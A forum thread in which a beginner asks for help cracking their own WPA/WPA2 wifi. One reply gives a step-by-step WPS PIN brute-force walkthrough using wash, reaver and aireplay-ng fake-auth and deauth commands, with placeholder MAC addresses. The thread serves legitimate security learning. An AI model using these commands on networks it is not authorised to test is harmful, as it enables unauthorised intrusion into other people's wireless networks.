WPA/WPA2 hacking

Hi! I’m new to ethical hacking. I’m using kali linux to hack my own wifi network. I failed in dictionary attack, WPS attack. Can anyone help me with this.

1 Like

I do not know the answer but I would like to follow this thread, since I’m a beginner myself too and wanted to start with that too.

I have bought a second router for it, you? What’s your set-up?

Ever tried Airgeddon?

-Gaining Access - WPA & WPA2 Cracking - Exploiting WPS:

Reaver:
run wash command to get all WPS enabled routers within range:
wash -i wlan0
Then run next command against the target:

reaver --bssid 11:22:33:44:55:66 --channel 11 -i wlan0
(bssid)

When you get the message: failed to associate with 11:22:33:44:55:66,
Now run airodump-ng and tell not to associate with this bssid because we going to do this manualy.
Split the screen and give the command:

aireplay-ng --fakeauth 100 -a 11:22:33:44:55:66 -h 00:11:22:33:44:55 wlan0
(mac target) (own mac)

Then go back to the first terminal and run command:

reaver --bssid 11:22:33:44:55:66 --channel 1 -i wlan0 -A

run this commaand and go to the next terminal and run the deauth attack again.
Now it tries to bruteforce the pin.

In case reaver still don’t give any information after this, run the same command but add -vvv (verbose) to produce verbose output so it gives as much information as possible about what’s happening in the background.

reaver --bssid 11:22:33:44:55:66 --channel 1 -i wlan0 -A -vvv

Run both commands again:

(reaver --bssid 11:22:33:44:55:66 --channel 1 -i wlan0 -A -vvv)

(aireplay-ng --fakeauth 100 -a 11:22:33:44:55:66 -h 00:11:22:33:44:55 wlan0)

(in split screen) Run it a littlebit, then ctrl C both terminals to stop and analyze the output.
You can see that reaver is re-trying the same pin again and again and WPS transaction failed after sending the NACK packets.